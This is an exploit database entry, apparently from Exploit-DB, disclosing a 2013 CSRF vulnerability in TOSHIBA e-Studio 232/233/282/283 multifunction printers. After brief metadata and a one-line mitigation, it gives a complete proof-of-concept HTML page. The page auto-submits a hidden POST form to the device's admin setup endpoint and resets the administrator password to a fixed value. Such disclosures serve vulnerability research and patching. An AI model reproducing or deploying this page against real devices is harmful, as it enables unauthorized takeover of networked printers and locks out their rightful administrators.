TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF Vulnerability

vendor:

e-Studio 232/233/282/283

by:

Hubert Gradek

7,8

CVSS

HIGH

CSRF

352

CWE

Product Name: e-Studio 232/233/282/283

Affected Version From: T377SY0EXXX

Affected Version To: T377SY0EXXX

Patch Exists: No

Related CWE: None

CPE: TOSHIBA e-Studio 232/233/282/283

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: TOSHIBA e-Studio 232 (T377SY0E354) / 233 (T377SY0E331)

2013

TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF Vulnerability

A CSRF vulnerability exists in TOSHIBA e-Studio 232/233/282/283 which allows an attacker to change the admin password. The exploit requires the attacker to craft a malicious HTML page which when visited by the admin, will submit a POST request to the vulnerable device with the new password. The password must be minimum 6 digits.

Mitigation:

Implementing CSRF protection on the vulnerable device and ensuring that the admin password is strong enough to prevent brute-force attacks.

Source

Exploit-DB raw data:

# Exploit Title: TOSHIBA e-Studio 232/233/282/283 Change Admin Password CSRF Vulnerability
# Date: 02.10.2013
# Exploit Author: Hubert Gradek (PL)
# Affected version: firmware T377SY0EXXX
# Tested on: TOSHIBA e-Studio 232 (T377SY0E354) / 233 (T377SY0E331)
# CVE : No CVE exists - 0day exploit



Password must be minimum 6 digits!!!
login: Admin


EXPLOIT:

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>TOSHIBA e-Studio 232/233/282/283 Change Admin Password</H2>
<form name="form0" action="http://[IP_ADDR]:8080/ADMIN/SETUP/Save" method="post">
<input type="hidden" name="MODE" value="General" />
<input type="hidden" name="EDTCHK" value="1" />
<input type="hidden" name="STRADMINPASS" value="331337" />
<input type="hidden" name="STRADMINPASSDUMMY" value="331337" />
<input type="hidden" name="STRCONADMINPASS" value="331337" />
</form>
</body>
</html>